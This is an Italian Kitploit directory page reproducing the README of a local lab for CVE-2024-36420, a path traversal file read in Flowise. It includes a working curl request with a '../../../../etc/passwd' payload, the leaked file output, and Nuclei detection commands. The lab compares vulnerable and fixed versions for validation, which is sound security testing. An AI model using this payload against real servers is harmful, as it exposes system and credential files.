Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC_CVE-2024-36420 — Laboratorio di riproduzione locale e template Nuclei per CVE-2024-36420, una vulnerabilità di lettura arbitraria di file in Flowise tramite il parametro fileName non sanificato. Valida il comportamento vulnerabile (1.4.3) e corretto (3.1.2). | Kitploit
Strumenti/GitHubGitHub/fineman999/poc_cve-2024-36420
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzingApprendimento e FormazioneLab e Pratica
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

Laboratorio di riproduzione locale e template Nuclei per CVE-2024-36420, una vulnerabilità di lettura arbitraria di file in Flowise tramite il parametro fileName non sanificato. Valida il comportamento vulnerabile (1.4.3) e corretto (3.1.2).

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

POC_CVE-2024-36420

Laboratorio di riproduzione locale e bozza di template nuclei per CVE-2024-36420 che colpisce Flowise.

Sommario

CVE-2024-36420 è una lettura arbitraria di file in Flowise causata dall'uso non sanificato del parametro body fileName in:

  • POST /api/v1/openai-assistants-file

Questo laboratorio è stato utilizzato per validare:

  • il comportamento vulnerabile su flowiseai/flowise:1.4.3
  • il comportamento negato sulla versione più recente flowiseai/flowise:3.1.2

Riferimenti

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
  • File

    • docker-compose.yml
    • docker-compose.latest.yml
    • CVE-2024-36420.yaml

    Test vulnerabile

    Avvia Flowise 1.4.3:

    root@kitploit:~
    docker compose down -v
    docker compose up -d
    docker compose logs --tail=100 flowise
    

    Verifica manuale:

    root@kitploit:~
    curl -i \
      -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
      -H 'Content-Type: application/json' \
      -d '{"fileName":"../../../../etc/passwd"}'
    

    Risposta vulnerabile osservata:

    root@kitploit:~
    HTTP/1.1 200 OK
    Content-Disposition: attachment; filename=passwd
    ...
    root:x:0:0:root:/root:/bin/ash
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    ...
    

    Controllo sulla versione più recente

    Avvia la versione più recente di Flowise 3.1.2:

    root@kitploit:~
    docker compose -f docker-compose.latest.yml down -v
    docker compose -f docker-compose.latest.yml up -d
    docker compose -f docker-compose.latest.yml logs --tail=100 flowise
    

    Verifica manuale:

    root@kitploit:~
    curl -i \
      -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
      -H 'Content-Type: application/json' \
      -d '{"fileName":"../../../../etc/passwd"}'
    

    Risposta osservata nella versione più recente:

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    {"error":"Unauthorized Access"}
    

    Nuclei

    Valida il template:

    root@kitploit:~
    nuclei -duc -validate -t CVE-2024-36420.yaml
    

    Esegui contro il target vulnerabile:

    root@kitploit:~
    nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml
    

    Comportamento atteso:

    • 1.4.3: match
    • 3.1.2: nessun match

    Note

    • Il divario di versione è accettabile perché questo repository afferma solo il comportamento osservato:
      • vulnerabile su 1.4.3
      • negato su 3.1.2
    • Non dichiara il limite esatto della versione corretta.
    • Non sono stati utilizzati target reali.
    Scarica lo strumento